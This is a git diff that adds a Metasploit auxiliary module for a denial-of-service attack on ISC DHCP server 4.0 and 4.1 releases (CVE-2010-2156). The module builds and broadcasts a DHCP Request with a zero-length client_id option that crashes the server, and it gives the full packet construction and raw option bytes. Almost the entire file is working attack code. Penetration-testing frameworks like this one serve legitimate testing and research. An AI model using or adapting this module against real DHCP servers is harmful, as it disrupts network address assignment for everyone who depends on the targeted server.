diff --git a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb new file mode 100644 index 0000000000..81d051d6a1 --- /dev/null +++ b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb @@ -0,0 +1,82 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'racket' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Dos + include Msf::Exploit::Capture + + def initialize + super( + 'Name' => 'ISC DHCP Zero Length ClientID Denial of Service Module', + 'Description' => %q{ + This module performs a Denial of Service Attack against the ISC DHCP server, + versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request + message with a 0-length client_id option for an IP address on the appropriate range + for the dhcp server. When ISC DHCP Server tries to hash this value it exits + abnormally. + }, + 'Author' => + [ + 'sid', # Original POC + 'TheLightCosine' # msf module + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', 'CVE-2010-2156' ], + [ 'URL', 'http://www.exploit-db.com/exploits/14185/'] + ] + ) + register_options( + [ + OptAddress.new('RIP', [true, 'A valid IP to request from the server']) + ] + ) + deregister_options('RHOST','FILTER','PCAPFILE') + end + + def run + print_status("Creating DHCP Request with 0-length ClientID") + open_pcap + n = Racket::Racket.new + + n.layers[3] = Racket::L3::IPv4.new + n.layers[3].dst_ip = '255.255.255.255' + n.layers[3].version = 4 + n.layers[3].hlen = 0x05 + n.layers[3].ttl = 44 + n.layers[3].protocol = 0x11 + + n.layers[4] = Racket::L4::UDP.new + n.layers[4].src_port = 68 + n.layers[4].dst_port = 67 + + n.layers[5] = Racket::L5::BOOTP.new + n.layers[5].cip = datastore['RIP'] + n.layers[5].chaddr = "\xaa\xaa\xaa\xaa\xaa\xaa" + n.layers[5].type = 1 + n.layers[5].payload = "\x63\x82\x53\x63\x35\x01\x03\x3d\x00\xff" + + n.layers[4].payload = n.layers[5] + n.layers[4].fix!(n.layers[3].src_ip, n.layers[3].dst_ip) + n.layers[4].payload = "" + + buff = n.pack + print_status("Sending malformed DHCP request...") + capture_sendto(buff, '255.255.255.255') + close_pcap + end +end \ No newline at end of file